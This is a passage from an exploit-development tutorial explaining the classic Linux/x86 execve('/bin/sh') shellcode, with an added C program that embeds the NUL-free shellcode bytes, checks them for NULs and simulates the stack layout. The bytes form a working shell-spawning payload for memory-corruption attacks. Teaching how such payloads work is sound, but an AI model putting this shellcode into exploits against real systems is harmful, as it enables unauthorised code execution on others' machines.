
We now create the string on the stack by pushing EAX, which is zero, as the string terminator, followed by the string /bin/sh (lines 4, 5, and 6). Because the stack grows toward lower addresses, the terminator is pushed first so that it ends up after the last character of the string. We store the pointer to the string, which is simply the current value of ESP, in EBX (line 7). With this, the first argument is ready. Now that we have the pointer, we build the argv array the same way: we push EAX first (it will serve as the NULL array terminator), followed by the pointer to /bin/sh (line 9). We then load the pointer to the array, again the current ESP, into the ECX register so that we can use it as the second argument of the system call. One caveat: the third argument, envp, travels in EDX and must be NULL or point to a valid array, so EDX has to be cleared as well (xor edx, edx, or a single cdq once EAX is zero).
All arguments are ready. We put the Linux execve system call number (11 on x86) in the AL register rather than in EAX, which keeps the upper bytes zero and avoids the NUL bytes that mov eax, 11 would put in the opcode, and execute int 0x80 to hand control to the kernel so that the system call runs and our process is replaced by /bin/sh ...
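The following C program is an added example, not code from the original text. It embeds one common NUL-free encoding of the sequence described above (this is my variant, the page's own listing may differ, for instance in how EDX is cleared, and it uses "/bin//sh" so that both string pushes are full four-byte immediates) and does two things a practitioner wants to check: it scans the opcode bytes for NUL bytes, and it replays the push sequence on a small model of the 32-bit stack to show that EBX ends up pointing at "/bin//sh\0" and ECX at an argv array whose first entry is EBX and whose second entry is NULL.

```c
/* Added example: replay the stack layout built by a classic Linux/x86
 * execve("/bin//sh") shellcode and check the opcode bytes for NULs.
 * Not code from the original page; the byte sequence below is one
 * common encoding and may differ from the page's own listing. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static const unsigned char shellcode[] = {
    0x31, 0xc0,                     /* xor  eax, eax    ; EAX = 0 */
    0x50,                           /* push eax         ; string terminator */
    0x68, 0x2f, 0x2f, 0x73, 0x68,   /* push 0x68732f2f  ; "//sh" */
    0x68, 0x2f, 0x62, 0x69, 0x6e,   /* push 0x6e69622f  ; "/bin" */
    0x89, 0xe3,                     /* mov  ebx, esp    ; EBX = &"/bin//sh" (arg 1) */
    0x50,                           /* push eax         ; argv terminator (NULL) */
    0x53,                           /* push ebx         ; argv[0] */
    0x89, 0xe1,                     /* mov  ecx, esp    ; ECX = argv (arg 2) */
    0x99,                           /* cdq              ; EDX = 0 = envp (arg 3) */
    0xb0, 0x0b,                     /* mov  al, 0x0b    ; __NR_execve on i386 */
    0xcd, 0x80,                     /* int  0x80        ; trap into the kernel */
};

/* Shellcode delivered through a string copy must not contain 0x00 or the
 * copy stops early. Returns the index of the first NUL byte, or -1. */
int first_nul_byte(const unsigned char *code, size_t len) {
    for (size_t i = 0; i < len; i++)
        if (code[i] == 0) return (int)i;
    return -1;
}

size_t shellcode_len(void) { return sizeof shellcode; }

/* Tiny model of the 32-bit stack: it grows downward and every push
 * writes a little-endian dword at the new ESP. */
#define STACK_SIZE 64
struct cpu {
    uint8_t  mem[STACK_SIZE];
    uint32_t esp;                 /* offset into mem; starts at the top */
    uint32_t eax, ebx, ecx, edx;
};

static void push32(struct cpu *c, uint32_t v) {
    c->esp -= 4;
    c->mem[c->esp + 0] = (uint8_t)(v);
    c->mem[c->esp + 1] = (uint8_t)(v >> 8);
    c->mem[c->esp + 2] = (uint8_t)(v >> 16);
    c->mem[c->esp + 3] = (uint8_t)(v >> 24);
}

static uint32_t load32(const struct cpu *c, uint32_t off) {
    return (uint32_t)c->mem[off] | (uint32_t)c->mem[off + 1] << 8 |
           (uint32_t)c->mem[off + 2] << 16 | (uint32_t)c->mem[off + 3] << 24;
}

/* Replay the argument-building instructions of the shellcode on the model. */
void build_execve_args(struct cpu *c) {
    memset(c, 0, sizeof *c);
    c->esp = STACK_SIZE;
    c->eax = 0;                 /* xor eax, eax */
    push32(c, c->eax);          /* push eax: four zero bytes end the string */
    push32(c, 0x68732f2f);      /* push "//sh" (little-endian: 2f 2f 73 68) */
    push32(c, 0x6e69622f);      /* push "/bin" (little-endian: 2f 62 69 6e) */
    c->ebx = c->esp;            /* mov ebx, esp: filename pointer */
    push32(c, c->eax);          /* push eax: argv[1] = NULL */
    push32(c, c->ebx);          /* push ebx: argv[0] = &"/bin//sh" */
    c->ecx = c->esp;            /* mov ecx, esp: argv pointer */
    c->edx = 0;                 /* cdq with EAX == 0: envp = NULL */
}

/* Returns 1 when the model shows exactly the layout execve expects:
 * EBX -> "/bin//sh", argv[0] == EBX, argv[1] == NULL, EDX == 0. */
int layout_is_valid(void) {
    struct cpu c;
    build_execve_args(&c);
    const char *name = (const char *)&c.mem[c.ebx];
    return strcmp(name, "/bin//sh") == 0 &&
           load32(&c, c.ecx) == c.ebx &&
           load32(&c, c.ecx + 4) == 0 &&
           c.edx == 0;
}

int main(void) {
    struct cpu c;
    build_execve_args(&c);
    printf("%zu bytes, first NUL at %d\n", shellcode_len(),
           first_nul_byte(shellcode, sizeof shellcode));
    printf("EBX -> \"%s\"; argv[0]=0x%02x argv[1]=0x%02x; layout valid: %d\n",
           (const char *)&c.mem[c.ebx], load32(&c, c.ecx),
           load32(&c, c.ecx + 4), layout_is_valid());
    return 0;
}
```

The model makes the ordering visible: "//sh" is pushed before "/bin" because the stack grows downward, so the later push lands at the lower address and the bytes read forward as "/bin//sh" followed by the four zero bytes from push eax. The same trick gives the NULL-terminated argv array for free, since the second push eax becomes argv[1] and the pushed EBX becomes argv[0].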